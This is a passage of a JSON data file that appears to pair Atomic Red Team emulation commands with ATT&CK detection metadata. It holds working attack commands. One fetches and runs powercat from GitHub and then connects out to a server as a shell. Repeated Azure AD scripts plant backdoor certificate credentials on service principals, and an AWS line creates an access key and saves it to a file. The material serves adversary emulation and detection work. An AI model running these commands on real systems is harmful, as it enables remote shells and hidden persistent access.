"command": "IEX (New-Object System.Net.Webclient).Downloadstring('https://raw.githubusercontent.com/besimorhino/powercat/ff755efeb2abc3f02fa0640cd01b87c4a59d6bb5/powercat.ps1')\npowercat -c #{server_ip} -p #{server_port}\n", + "name": "powershell" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + [ + "5156", + "Windows Firewall" + ], + [ + "4688", + "Process Execution" + ], + [ + "Malware reverse engineering" + ], + [ + "Packet capture" + ], + [ + "Netflow/Enclave netflow" + ], + [ + "5156", + "Windows Firewall" + ], + [ + "4688", + "Process Execution" + ], + [ + "Malware reverse engineering" + ], + [ + "Packet capture" + ], + [ + "Netflow/Enclave netflow" + ], + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + } + ], + "external_reference": [ + "https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html", + "https://www.fireeye.com/blog/threat-research/2014/11/operation_doubletap.html", + null + ] + }, + { + "technique_id": "T1098.001", + "command_list": [ + "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"jonh@contoso.com\", $Pword\nConnect-AzureAD -Credential $Credential\n\n$sp = Get-AzureADServicePrincipal -Searchstring \"#{service_principal_name}\"\nif ($sp -eq $null) { Write-Warning \"Service Principal not found\"; exit }\n# in the context of an ART test (and not a real attack), we don't need to keep access for too long. In case the cleanup command isn't called, it's better to ensure that everything expires after 1 day so it doesn't leave this backdoor open for too long\n$certNotAfter = (Get-Date).AddDays(2)\n$credNotAfter = (Get-Date).AddDays(1)\n$thumb = (New-SelfSignedCertificate -DnsName \"atomicredteam.example.com\" -FriendlyName \"AtomicCert\" -CertStoreLocation \"cert:\\CurrentUser\\My\" -KeyExportPolicy Exportable -Provider \"Microsoft Enhanced RSA and AES Cryptographic Provider\" -NotAfter $certNotAfter).Thumbprint\n$pwd = ConvertTo-SecureString -String \"#{certificate_password}\" -Force -AsPlainText\nExport-PfxCertificate -cert \"cert:\\CurrentUser\\my\\$thumb\" -FilePath \"#{path_to_cert}\\#{service_principal_name}.pfx\" -Password $pwd\n\n$cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate(\"#{path_to_cert}\\#{service_principal_name}.pfx\", $pwd)\n$keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData())\n\nNew-AzureADServicePrincipalKeyCredential -ObjectId $sp.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier \"AtomicTest\" -Usage Verify -Value $keyValue -EndDate $credNotAfter\n\nStart-Sleep -s 30\n$tenant=Get-AzureADTenantDetail\n$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $sp.AppId -CertificateThumbprint $thumb\nWrite-Host \"Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)\"\nWrite-Host \"End of Hijacking\"\n", + "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String \"p4sswd\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzureAD -Credential $Credential\n\n$sp = Get-AzureADServicePrincipal -Searchstring \"#{service_principal_name}\"\nif ($sp -eq $null) { Write-Warning \"Service Principal not found\"; exit }\n# in the context of an ART test (and not a real attack), we don't need to keep access for too long. In case the cleanup command isn't called, it's better to ensure that everything expires after 1 day so it doesn't leave this backdoor open for too long\n$certNotAfter = (Get-Date).AddDays(2)\n$credNotAfter = (Get-Date).AddDays(1)\n$thumb = (New-SelfSignedCertificate -DnsName \"atomicredteam.example.com\" -FriendlyName \"AtomicCert\" -CertStoreLocation \"cert:\\CurrentUser\\My\" -KeyExportPolicy Exportable -Provider \"Microsoft Enhanced RSA and AES Cryptographic Provider\" -NotAfter $certNotAfter).Thumbprint\n$pwd = ConvertTo-SecureString -String \"#{certificate_password}\" -Force -AsPlainText\nExport-PfxCertificate -cert \"cert:\\CurrentUser\\my\\$thumb\" -FilePath \"#{path_to_cert}\\#{service_principal_name}.pfx\" -Password $pwd\n\n$cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate(\"#{path_to_cert}\\#{service_principal_name}.pfx\", $pwd)\n$keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData())\n\nNew-AzureADServicePrincipalKeyCredential -ObjectId $sp.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier \"AtomicTest\" -Usage Verify -Value $keyValue -EndDate $credNotAfter\n\nStart-Sleep -s 30\n$tenant=Get-AzureADTenantDetail\n$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $sp.AppId -CertificateThumbprint $thumb\nWrite-Host \"Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)\"\nWrite-Host \"End of Hijacking\"\n", + "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzureAD -Credential $Credential\n\n$sp = Get-AzureADServicePrincipal -Searchstring \"SuperSP\"\nif ($sp -eq $null) { Write-Warning \"Service Principal not found\"; exit }\n# in the context of an ART test (and not a real attack), we don't need to keep access for too long. In case the cleanup command isn't called, it's better to ensure that everything expires after 1 day so it doesn't leave this backdoor open for too long\n$certNotAfter = (Get-Date).AddDays(2)\n$credNotAfter = (Get-Date).AddDays(1)\n$thumb = (New-SelfSignedCertificate -DnsName \"atomicredteam.example.com\" -FriendlyName \"AtomicCert\" -CertStoreLocation \"cert:\\CurrentUser\\My\" -KeyExportPolicy Exportable -Provider \"Microsoft Enhanced RSA and AES Cryptographic Provider\" -NotAfter $certNotAfter).Thumbprint\n$pwd = ConvertTo-SecureString -String \"#{certificate_password}\" -Force -AsPlainText\nExport-PfxCertificate -cert \"cert:\\CurrentUser\\my\\$thumb\" -FilePath \"#{path_to_cert}\\SuperSP.pfx\" -Password $pwd\n\n$cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate(\"#{path_to_cert}\\SuperSP.pfx\", $pwd)\n$keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData())\n\nNew-AzureADServicePrincipalKeyCredential -ObjectId $sp.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier \"AtomicTest\" -Usage Verify -Value $keyValue -EndDate $credNotAfter\n\nStart-Sleep -s 30\n$tenant=Get-AzureADTenantDetail\n$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $sp.AppId -CertificateThumbprint $thumb\nWrite-Host \"Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)\"\nWrite-Host \"End of Hijacking\"\n", + "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzureAD -Credential $Credential\n\n$sp = Get-AzureADServicePrincipal -Searchstring \"#{service_principal_name}\"\nif ($sp -eq $null) { Write-Warning \"Service Principal not found\"; exit }\n# in the context of an ART test (and not a real attack), we don't need to keep access for too long. In case the cleanup command isn't called, it's better to ensure that everything expires after 1 day so it doesn't leave this backdoor open for too long\n$certNotAfter = (Get-Date).AddDays(2)\n$credNotAfter = (Get-Date).AddDays(1)\n$thumb = (New-SelfSignedCertificate -DnsName \"atomicredteam.example.com\" -FriendlyName \"AtomicCert\" -CertStoreLocation \"cert:\\CurrentUser\\My\" -KeyExportPolicy Exportable -Provider \"Microsoft Enhanced RSA and AES Cryptographic Provider\" -NotAfter $certNotAfter).Thumbprint\n$pwd = ConvertTo-SecureString -String \"Passw0rd\" -Force -AsPlainText\nExport-PfxCertificate -cert \"cert:\\CurrentUser\\my\\$thumb\" -FilePath \"#{path_to_cert}\\#{service_principal_name}.pfx\" -Password $pwd\n\n$cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate(\"#{path_to_cert}\\#{service_principal_name}.pfx\", $pwd)\n$keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData())\n\nNew-AzureADServicePrincipalKeyCredential -ObjectId $sp.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier \"AtomicTest\" -Usage Verify -Value $keyValue -EndDate $credNotAfter\n\nStart-Sleep -s 30\n$tenant=Get-AzureADTenantDetail\n$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $sp.AppId -CertificateThumbprint $thumb\nWrite-Host \"Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)\"\nWrite-Host \"End of Hijacking\"\n", + "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzureAD -Credential $Credential\n\n$sp = Get-AzureADServicePrincipal -Searchstring \"#{service_principal_name}\"\nif ($sp -eq $null) { Write-Warning \"Service Principal not found\"; exit }\n# in the context of an ART test (and not a real attack), we don't need to keep access for too long. In case the cleanup command isn't called, it's better to ensure that everything expires after 1 day so it doesn't leave this backdoor open for too long\n$certNotAfter = (Get-Date).AddDays(2)\n$credNotAfter = (Get-Date).AddDays(1)\n$thumb = (New-SelfSignedCertificate -DnsName \"atomicredteam.example.com\" -FriendlyName \"AtomicCert\" -CertStoreLocation \"cert:\\CurrentUser\\My\" -KeyExportPolicy Exportable -Provider \"Microsoft Enhanced RSA and AES Cryptographic Provider\" -NotAfter $certNotAfter).Thumbprint\n$pwd = ConvertTo-SecureString -String \"#{certificate_password}\" -Force -AsPlainText\nExport-PfxCertificate -cert \"cert:\\CurrentUser\\my\\$thumb\" -FilePath \"$env:TEMP\\#{service_principal_name}.pfx\" -Password $pwd\n\n$cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate(\"$env:TEMP\\#{service_principal_name}.pfx\", $pwd)\n$keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData())\n\nNew-AzureADServicePrincipalKeyCredential -ObjectId $sp.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier \"AtomicTest\" -Usage Verify -Value $keyValue -EndDate $credNotAfter\n\nStart-Sleep -s 30\n$tenant=Get-AzureADTenantDetail\n$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $sp.AppId -CertificateThumbprint $thumb\nWrite-Host \"Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)\"\nWrite-Host \"End of Hijacking\"\n", + "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"jonh@contoso.com\", $Pword\nConnect-AzureAD -Credential $Credential\n\n$app = Get-AzureADApplication -Searchstring \"#{application_name}\"\nif ($app -eq $null) { Write-Warning \"Application not found\"; exit }\n$certNotAfter = (Get-Date).AddDays(2)\n$credNotAfter = (Get-Date).AddDays(1)\n$thumb = (New-SelfSignedCertificate -DnsName \"atomicredteam.example.com\" -FriendlyName \"AtomicCert\" -CertStoreLocation \"cert:\\CurrentUser\\My\" -KeyExportPolicy Exportable -Provider \"Microsoft Enhanced RSA and AES Cryptographic Provider\" -NotAfter $certNotAfter).Thumbprint\n$pwd = ConvertTo-SecureString -String \"#{certificate_password}\" -Force -AsPlainText\nExport-PfxCertificate -cert \"cert:\\CurrentUser\\my\\$thumb\" -FilePath \"#{path_to_cert}\\#{application_name}.pfx\" -Password $pwd\n\n$cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate(\"#{path_to_cert}\\#{application_name}.pfx\", $pwd)\n$keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData())\n\nNew-AzureADApplicationKeyCredential -ObjectId $app.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier \"AtomicTest\" -Usage Verify -Value $keyValue -EndDate $credNotAfter\n\nStart-Sleep -s 30\n$tenant=Get-AzureADTenantDetail\n$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $app.AppId -CertificateThumbprint $thumb\nWrite-Host \"Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)\"\nWrite-Host \"End of Hijacking\"\n", + "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String \"p4sswd\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzureAD -Credential $Credential\n\n$app = Get-AzureADApplication -Searchstring \"#{application_name}\"\nif ($app -eq $null) { Write-Warning \"Application not found\"; exit }\n$certNotAfter = (Get-Date).AddDays(2)\n$credNotAfter = (Get-Date).AddDays(1)\n$thumb = (New-SelfSignedCertificate -DnsName \"atomicredteam.example.com\" -FriendlyName \"AtomicCert\" -CertStoreLocation \"cert:\\CurrentUser\\My\" -KeyExportPolicy Exportable -Provider \"Microsoft Enhanced RSA and AES Cryptographic Provider\" -NotAfter $certNotAfter).Thumbprint\n$pwd = ConvertTo-SecureString -String \"#{certificate_password}\" -Force -AsPlainText\nExport-PfxCertificate -cert \"cert:\\CurrentUser\\my\\$thumb\" -FilePath \"#{path_to_cert}\\#{application_name}.pfx\" -Password $pwd\n\n$cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate(\"#{path_to_cert}\\#{application_name}.pfx\", $pwd)\n$keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData())\n\nNew-AzureADApplicationKeyCredential -ObjectId $app.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier \"AtomicTest\" -Usage Verify -Value $keyValue -EndDate $credNotAfter\n\nStart-Sleep -s 30\n$tenant=Get-AzureADTenantDetail\n$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $app.AppId -CertificateThumbprint $thumb\nWrite-Host \"Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)\"\nWrite-Host \"End of Hijacking\"\n", + "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzureAD -Credential $Credential\n\n$app = Get-AzureADApplication -Searchstring \"SuperApp\"\nif ($app -eq $null) { Write-Warning \"Application not found\"; exit }\n$certNotAfter = (Get-Date).AddDays(2)\n$credNotAfter = (Get-Date).AddDays(1)\n$thumb = (New-SelfSignedCertificate -DnsName \"atomicredteam.example.com\" -FriendlyName \"AtomicCert\" -CertStoreLocation \"cert:\\CurrentUser\\My\" -KeyExportPolicy Exportable -Provider \"Microsoft Enhanced RSA and AES Cryptographic Provider\" -NotAfter $certNotAfter).Thumbprint\n$pwd = ConvertTo-SecureString -String \"#{certificate_password}\" -Force -AsPlainText\nExport-PfxCertificate -cert \"cert:\\CurrentUser\\my\\$thumb\" -FilePath \"#{path_to_cert}\\SuperApp.pfx\" -Password $pwd\n\n$cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate(\"#{path_to_cert}\\SuperApp.pfx\", $pwd)\n$keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData())\n\nNew-AzureADApplicationKeyCredential -ObjectId $app.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier \"AtomicTest\" -Usage Verify -Value $keyValue -EndDate $credNotAfter\n\nStart-Sleep -s 30\n$tenant=Get-AzureADTenantDetail\n$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $app.AppId -CertificateThumbprint $thumb\nWrite-Host \"Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)\"\nWrite-Host \"End of Hijacking\"\n", + "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzureAD -Credential $Credential\n\n$app = Get-AzureADApplication -Searchstring \"#{application_name}\"\nif ($app -eq $null) { Write-Warning \"Application not found\"; exit }\n$certNotAfter = (Get-Date).AddDays(2)\n$credNotAfter = (Get-Date).AddDays(1)\n$thumb = (New-SelfSignedCertificate -DnsName \"atomicredteam.example.com\" -FriendlyName \"AtomicCert\" -CertStoreLocation \"cert:\\CurrentUser\\My\" -KeyExportPolicy Exportable -Provider \"Microsoft Enhanced RSA and AES Cryptographic Provider\" -NotAfter $certNotAfter).Thumbprint\n$pwd = ConvertTo-SecureString -String \"Passw0rd\" -Force -AsPlainText\nExport-PfxCertificate -cert \"cert:\\CurrentUser\\my\\$thumb\" -FilePath \"#{path_to_cert}\\#{application_name}.pfx\" -Password $pwd\n\n$cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate(\"#{path_to_cert}\\#{application_name}.pfx\", $pwd)\n$keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData())\n\nNew-AzureADApplicationKeyCredential -ObjectId $app.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier \"AtomicTest\" -Usage Verify -Value $keyValue -EndDate $credNotAfter\n\nStart-Sleep -s 30\n$tenant=Get-AzureADTenantDetail\n$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $app.AppId -CertificateThumbprint $thumb\nWrite-Host \"Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)\"\nWrite-Host \"End of Hijacking\"\n", + "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzureAD -Credential $Credential\n\n$app = Get-AzureADApplication -Searchstring \"#{application_name}\"\nif ($app -eq $null) { Write-Warning \"Application not found\"; exit }\n$certNotAfter = (Get-Date).AddDays(2)\n$credNotAfter = (Get-Date).AddDays(1)\n$thumb = (New-SelfSignedCertificate -DnsName \"atomicredteam.example.com\" -FriendlyName \"AtomicCert\" -CertStoreLocation \"cert:\\CurrentUser\\My\" -KeyExportPolicy Exportable -Provider \"Microsoft Enhanced RSA and AES Cryptographic Provider\" -NotAfter $certNotAfter).Thumbprint\n$pwd = ConvertTo-SecureString -String \"#{certificate_password}\" -Force -AsPlainText\nExport-PfxCertificate -cert \"cert:\\CurrentUser\\my\\$thumb\" -FilePath \"$env:TEMP\\#{application_name}.pfx\" -Password $pwd\n\n$cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate(\"$env:TEMP\\#{application_name}.pfx\", $pwd)\n$keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData())\n\nNew-AzureADApplicationKeyCredential -ObjectId $app.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier \"AtomicTest\" -Usage Verify -Value $keyValue -EndDate $credNotAfter\n\nStart-Sleep -s 30\n$tenant=Get-AzureADTenantDetail\n$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $app.AppId -CertificateThumbprint $thumb\nWrite-Host \"Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)\"\nWrite-Host \"End of Hijacking\"\n", + "aws iam create-access-key --user-name atomicredteam > $PathToAtomicsFolder/T1098.001/bin/aws_secret.creds\ncd $PathToAtomicsFolder/T1098.001/bin/\n./aws_secret.sh\n" + ], + "commands": [ + { + "command": "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"jonh@contoso.com\", $Pword\nConnect-AzureAD -Credential $Credential\n\n$sp = Get-AzureADServicePrincipal -Searchstring \"#{service_principal_name}\"\nif ($sp -eq $null) { Write-Warning \"Service Principal not found\"; exit }\n# in the context of an ART test (and not a real attack), we don't need to keep access for too long. In case the cleanup command isn't called, it's better to ensure that everything expires after 1 day so it doesn't leave this backdoor open for too long\n$certNotAfter = (Get-Date).AddDays(2)\n$credNotAfter = (Get-Date).AddDays(1)\n$thumb = (New-SelfSignedCertificate -DnsName \"atomicredteam.example.com\" -FriendlyName \"AtomicCert\" -CertStoreLocation \"cert:\\CurrentUser\\My\" -KeyExportPolicy Exportable -Provider \"Microsoft Enhanced RSA and AES Cryptographic Provider\" -NotAfter $certNotAfter).Thumbprint\n$pwd = ConvertTo-SecureString -String \"#{certificate_password}\" -Force -AsPlainText\nExport-PfxCertificate -cert \"cert:\\CurrentUser\\my\\$thumb\" -FilePath \"#{path_to_cert}\\#{service_principal_name}.pfx\" -Password $pwd\n\n$cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate(\"#{path_to_cert}\\#{service_principal_name}.pfx\", $pwd)\n$keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData())\n\nNew-AzureADServicePrincipalKeyCredential -ObjectId $sp.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier \"AtomicTest\" -Usage Verify -Value $keyValue -EndDate $credNotAfter\n\nStart-Sleep -s 30\n$tenant=Get-AzureADTenantDetail\n$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $sp.AppId -CertificateThumbprint $thumb\nWrite-Host \"Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)\"\nWrite-Host \"End of Hijacking\"\n", + "source": "atomics/T1098.001/T1098.001.yaml", + "name": "Atomic Red Team Test - Account Manipulation: Additional Cloud Credentials" + }, + { + "command": "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String \"p4sswd\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzureAD -Credential $Credential\n\n$sp = Get-AzureADServicePrincipal -Searchstring \"#{service_principal_name}\"\nif ($sp -eq $null) { Write-Warning \"Service Principal not found\"; exit }\n# in the context of an ART test (and not a real attack), we don't need to keep access for too long. In case the cleanup command isn't called, it's better to ensure that everything expires after 1 day so it doesn't leave this backdoor open for too long\n$certNotAfter = (Get-Date).AddDays(2)\n$credNotAfter = (Get-Date).AddDays(1)\n$thumb = (New-SelfSignedCertificate -DnsName \"atomicredteam.example.com\" -FriendlyName \"AtomicCert\" -CertStoreLocation \"cert:\\CurrentUser\\My\" -KeyExportPolicy Exportable -Provider \"Microsoft Enhanced RSA and AES Cryptographic Provider\" -NotAfter $certNotAfter).Thumbprint\n$pwd = ConvertTo-SecureString -String \"#{certificate_password}\" -Force -AsPlainText\nExport-PfxCertificate -cert \"cert:\\CurrentUser\\my\\$thumb\" -FilePath \"#{path_to_cert}\\#{service_principal_name}.pfx\" -Password $pwd\n\n$cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate(\"#{path_to_cert}\\#{service_principal_name}.pfx\", $pwd)\n$keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData())\n\nNew-AzureADServicePrincipalKeyCredential -ObjectId $sp.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier \"AtomicTest\" -Usage Verify -Value $keyValue -EndDate $credNotAfter\n\nStart-Sleep -s 30\n$tenant=Get-AzureADTenantDetail\n$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $sp.AppId -CertificateThumbprint $thumb\nWrite-Host \"Application Hijacking worked. 